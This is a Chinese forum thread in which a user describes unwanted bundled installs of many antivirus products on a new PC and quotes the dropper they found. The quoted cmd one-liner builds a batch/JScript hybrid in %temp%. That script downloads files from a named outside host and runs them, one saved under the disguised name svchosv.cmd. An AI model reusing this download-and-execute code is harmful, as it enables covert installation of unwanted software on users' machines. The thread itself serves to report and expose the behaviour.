遇见过的最强捆绑,各大杀软齐聚一堂~

lixihong10

今天用一台新机器测试ADSL换IP，离开20分钟后画面简直不能直视，各大杀软齐聚一堂~

记得好像就装了一个 驱动人生， 一个官网下载的QQ轻聊版 ,一个搜狗拼音。也不知道那个下的黑手。
没有装其他监控程序，所以没能找到母体。只找到了一些软件安装日志和两个核心批处理，和发现一个统计的网站。


"C:\Program Files\Internet Explorer\iexplore.exe"  http://a01.jddbtc.com/4/cnzz/tj.html?=d06

这个是 CMD文件的参数。
[mw_shl_code=html,true]cmd /c del %temp%\0.cmd&&echo echo=1/*^>nul^&@cls>%temp%\0.cmd&&echo call :http "http://a01.jddbtc.com/4/zong/1.asp" %temp%\360sd.dat>>%temp%\0.cmd&&echo call :http "http://a01.jddbtc.com/4/t/index.asp?a01.jddbtc.com/4/fen/d.asp?=d03" %temp%\svchosv.cmd>>%temp%\0.cmd&&echo set vv=d03>>%temp%\0.cmd&&echo %temp%\svchosv.cmd>>%temp%\0.cmd&&echo goto :eof>>%temp%\0.cmd&&echo :http>>%temp%\0.cmd&&echo echo Source:"%~1">>%temp%\0.cmd&&echo echo Destination:"%~f2">>%temp%\0.cmd&&echo cscript -nologo -e:jscript ^"%temp^%\0.cmd^" "%~1" "%~2">>%temp%\0.cmd&&echo goto :eof>>%temp%\0.cmd&&echo */>>%temp%\0.cmd&&echo var iLocal,iRemote,xPost,sGet;>>%temp%\0.cmd&&echo iLocal =WScript.Arguments(1);>>%temp%\0.cmd&&echo iRemote = WScript.Arguments(0);>>%temp%\0.cmd&&echo iLocal=iLocal.toLowerCase();>>%temp%\0.cmd&&echo iRemote=iRemote.toLowerCase();>>%temp%\0.cmd&&echo xPost = new ActiveXObject("WinHttp"+String.fromCharCode(0x2e)+"WinHttpRequest.5.1");>>%temp%\0.cmd&&echo xPost.Open("GET",iRemote,0);>>%temp%\0.cmd&&echo xPost.Send();>>%temp%\0.cmd&&echo sGet = new ActiveXObject("ADODB"+String.fromCharCode(0x2e)+"Stream");>>%temp%\0.cmd&&echo sGet.Mode = 3;>>%temp%\0.cmd&&echo sGet.Type = 1;>>%temp%\0.cmd&&echo sGet.Open();>>%temp%\0.cmd&&echo sGet.Write(xPost.responseBody);>>%temp%\0.cmd&&echo sGet.SaveToFile(iLocal,2);>>%temp%\0.cmd&&%temp%\0.cmd[/mw_shl_code]


还有两个加密了的批处理，打开乱码的换下编码格式就行了。

kxmp

360sd.dat是啥

电脑发烧友

。。。。流氓就是在你不小心的时候溜进你的电脑。

pal家族

全家福啊

lixihong10

kxmp 发表于 2015-10-30 22:18
360sd.dat是啥

360杀毒额。。。。

蓝天二号

不换格式，，windows 也能阻止，，